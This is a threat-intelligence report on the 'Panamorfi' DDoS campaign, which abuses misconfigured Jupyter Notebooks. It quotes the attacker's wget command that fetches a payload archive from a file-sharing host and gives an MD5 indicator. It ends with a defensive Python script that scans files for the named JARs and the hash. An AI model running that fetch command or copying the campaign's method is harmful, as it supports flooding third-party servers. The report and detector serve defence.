Details of a new distributed denial-of-service (DDoS) attack campaign that targets improperly configured Jupyter Notebooks have been revealed by cybersecurity experts.
The threat actor launches the DDoS attack, dubbed “Panamorfi,” using the Java-based Minecraft DDoS tool mineping. So far, the attack has exclusively targeted misconfigured Jupyter Notebooks.
Initial access to our publicly exposed Jupyter Notebook honeypot was obtained by the threat actor “yawixooo” (as per GitHub), who then executed the following command:
‘wget https://filebin.net/archive/h4fhifnlykw224h9/zip’
The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar. The former is needed to connect to a Discord channel and start the mineping.jar package.
The connector JAR file contains the initial execution code. The threat actor uses Discord to control the DDoS attack. The victim’s machine connects to the Discord channel using the specified credentials.
The connector then loads mineping.jar, a known Minecraft DDoS tool available on GitHub, to launch a TCP flood attack. This attack overloads the target server with TCP connection requests, and the results are reported to the Discord channel.
The threat actor, identified as ‘yawixooo,’ has an active public GitHub repository. It includes a Minecraft server configuration and an HTML page under construction.
IOC:
42989a405c8d7c9cb68c323ae9a9a318
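A sweep for the indicators named in this article, as an added example that is not part of the original report: it flags files named conn.jar or mineping.jar, files matching the listed MD5, and ZIP archives that hold both JARs. The function names are illustrative, and the article does not say which file the MD5 identifies.

```python
import hashlib
import os
import zipfile

# Indicators taken from the article; which file the MD5 belongs to is not stated there.
PAGE_MD5 = {"42989a405c8d7c9cb68c323ae9a9a318"}
PAGE_JAR_NAMES = {"conn.jar", "mineping.jar"}


def md5_of(path, chunk=1 << 20):
    """Hash a file in chunks so large datasets on the host do not exhaust memory."""
    h = hashlib.md5(usedforsecurity=False)  # IOC matching only (Python 3.9+)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, md5_iocs=PAGE_MD5, jar_names=PAGE_JAR_NAMES):
    """Return sorted (path, reason) findings for regular files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                if name.lower() in jar_names:
                    findings.append((path, "jar-name"))
                if md5_of(path) in md5_iocs:
                    findings.append((path, "md5-match"))
                # The download URL ends in /zip, so wget saves a file called "zip"
                # with no extension: detect archives by content, not by name.
                if zipfile.is_zipfile(path):
                    with zipfile.ZipFile(path) as zf:
                        members = {os.path.basename(m).lower() for m in zf.namelist()}
                    if jar_names <= members:
                        findings.append((path, "zip-with-both-jars"))
            except (OSError, zipfile.BadZipFile):
                findings.append((path, "unreadable"))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for path, reason in sweep(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{reason}\t{path}")
```

Run it against the notebook server's working directory and the home directory of the account Jupyter runs as; a filename hit alone is weak evidence and should be confirmed by inspecting the file.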